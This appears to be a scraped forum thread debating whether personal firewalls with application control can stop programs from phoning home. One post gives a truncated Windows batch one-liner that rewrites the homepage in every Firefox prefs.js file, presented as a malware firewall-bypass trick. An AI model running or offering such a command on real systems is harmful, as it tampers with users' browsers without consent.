I guess you already know about layered scurity.Theres a nice write up here from those "clueless" people at the NSA.Perhaps they should employ Mr Gottschalk for thier security needs instead. http://66.102.9.104/search?q=cache:Ey9MYav_X80J:
it's the windows way of doing things -- also the achilles heal ! I always hated the registry; totally non-portable solution.
B. Nice wrote: >As any personal firewall it runs in the same environment as it is >supposed to protect. What else do you need to know?
true if you're careless enough to login as admin and then run IE. the LUA concept runs users at limited access rights and thus only the registry for the current user can be attacked -- and the PF is protected.
Right, then please stick to technical facts. There are numerous IPC methods with no security protocols in almost any operating system, not to mention purely passive communication like writing to config files.
For your convience, how normal malware tunnels your firewall:
for /f "delims=" %i in ('dir /s /b prefs.js') do echo user_pref('browser.startup.homepage','
To find someone who is so stupid to recommend a program that obviously can't work?
No. This is a place to discuss about real firewalls, VPN and network communication as well as serious host-based packet filters (whereas 'serious' excludes the common 'personal firewall' shit and strange ideas about non-working application control).
Why? Actually it's quite simple:
( ) You trust your applications, then such control is purely superfluos. ( ) You don't trust your applications. Then they're in fact MALWARE, as legitimate as they may seem, and you seriously expect them to circumvent your pseudo-security. In fact, most such programs really do, and not because they're malicious, but to circumvent the network error that your non-serious trial of security poses. You log their first trial, you won't see the second one, which is successful.
Are you talking about an empty set of programs? You could at least try to name an example which we will easily deconstruct.
Usually not, because there's no serious program that does so. Could you state an example?
So you really never bothered to actually audit your measures, did you? Maybe you would notice that it's even pretty common to use the Raw Sockets API to easily bypass such stupid filters.
Most likely your incompetence. I haven't seen any legitimate program yet that "phones home" without being configured so or doing so by a user-invoked event (f.e. clicking an rtsp:// URL in a webbrowser, opening up VideoLanClient, which then tries to connect to that server).
Yes, I do. And you should too, because there are thousands, if not millions of user questions in web forums, Usenet and everywhere around because of totally unrelated messages, whereas those broken products simply invented non-existing packets/connections/calls.
Nah, that's just what you wish. Reality looks different.
And interestingly, I don't have any need to employ filters to make programs not opening any unwanted network connections. They simply don't do. Maybe I did something right?
Because the term "defense in depth" describes the real non-misunderstood concept without any buzz.
I'd say it's even more trivial. For spouting rubbish, you need to be creative - restoring an API hook (either usermode or kernelmode) is a trivial thing of some few codelines that simply do the obvious (e.g. documented!) thing.
Then you should be able to spot the obvious flaw.
Ahh i see....a bit like half a dozen of one and six of the other.
I guess your much more creative than i gave you credit for.
Ohh i do ..i do. me
I must've missed the charter for this newsgroup.
Care to repost it?
Notan
Have mentioned several programs that send without I asking for it.
Even MS MediaPlayer send thing even if the checkbox not to send anything is checked. Word does. I have disk defraggers that insist on connecting to the net (why on earth do they need that) etc etc etc.
But all of these ARE stopped by ZA (and probalbly Comodo, haven't testet with that one yet). So if you can't stop ALL communication you can stop some (from programs that don't use "back-ways" to send stuff)
So again. This is NOT a discussion of security holes. This is a question on what programs I can use to do the same thing as ZA and Comodo to check/stop appplications that try to send/act as servers using the "normal" way (no fancy programming to use advanced ways).
So in that context: What programs will give me that functionality without using 30MB of my memory and adding FW and other stuff that I allready have in my router. That is as simple as it is :-)
Reading through this thread, I didn't find just one little program mentioned.
Very doubtful. Maybe you should read the documentation "Using Windows XP with Service Pack 2 in a managed environment - controlling communication with the internet" again (or in first place), carefully analyze every option related to WMP and find the ones you overlooked / ignored / misunderstood. And then check again if it still does "phone home".
So not just I can verify that the entire documentation holds correctly for all invoked components, it even sheds a pretty good light on Windows XP: You can avoid everything except the activation process, which also can be done by anonymous telephone - and the only bad thing is that you can't easily aqquire the activation-free Corporate edition.
That would be even more news.
Huh? Which ones?
Hint: "normal" applications already use those fancy ways. Did I ever mention Adobe License Manager Service (which ships with almost any costy Adobe product)? It uses connections via Raw Sockets API to bypass exactly such stupid "personal firewalls", because if the connection was blocked it simply wouldn't work and the users are too stupid to configure it correctly. What about RealPlayer? It simply writes an HTML file to the temp dir, then invokes the default webbrowser using the common ShellExecuteEx() function and uses a META redirect to connect to the outside. I would do it the same way. And if a "firewall" ever cached it as a "phone home" attempt, I'd call it stupid, because it produced the network connection error in first place and made such a "use the webbrowser's proxy and authentication" error correction necessary.
A virtual machine like VMware?
By using APPs monitoring, how will you determine if what your "nice" programs are doing is to be considered "good" or "bad"?
Please explain your experience of Word connecting and sending stuff. Where does Word send what?
/B. Nice
I agree. The registry is implemented terribly incompetent.
Yours, VB.
Why don't you configure these applications not to communicate?
Yours, VB.
They do. This often is called "online software update", and is an important feature.
The misunderstanding is, that nice programs of course can be configured wether to communicate or not. And not-so-nice programs cannot be configured and cannot be prevented from communicating.
Yours, VB.
Really? Being correctly configured not to do so? Could you describe an example?
I doubt that.
I doubt that. Zone Alarm claims to do so, but this is just wrong. If you're talking about programs, where the author has no doubtful intentions, then configuring will be enough. If the author has such intentions, then she/he will ignore Zone Alarm.
Yours, VB.
Have done that were possible. But some of them still cause a "trying to connect to internet" :-/
OK, can you state an example of such an application, your entire configuration and the communication taking place?
Right, and that's why it's not "phoning home", but you're advising it to "phone" somewhere by the configuration you entered (or left).
It's a simple database with B+ tree architecture and a hash table to address the individual nodes. SQLLite is almost no way different, and about any database is implemented like that. That's why it doesn't slow down from
1000+ keys.
Please give an example.
Yours, VB.
Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.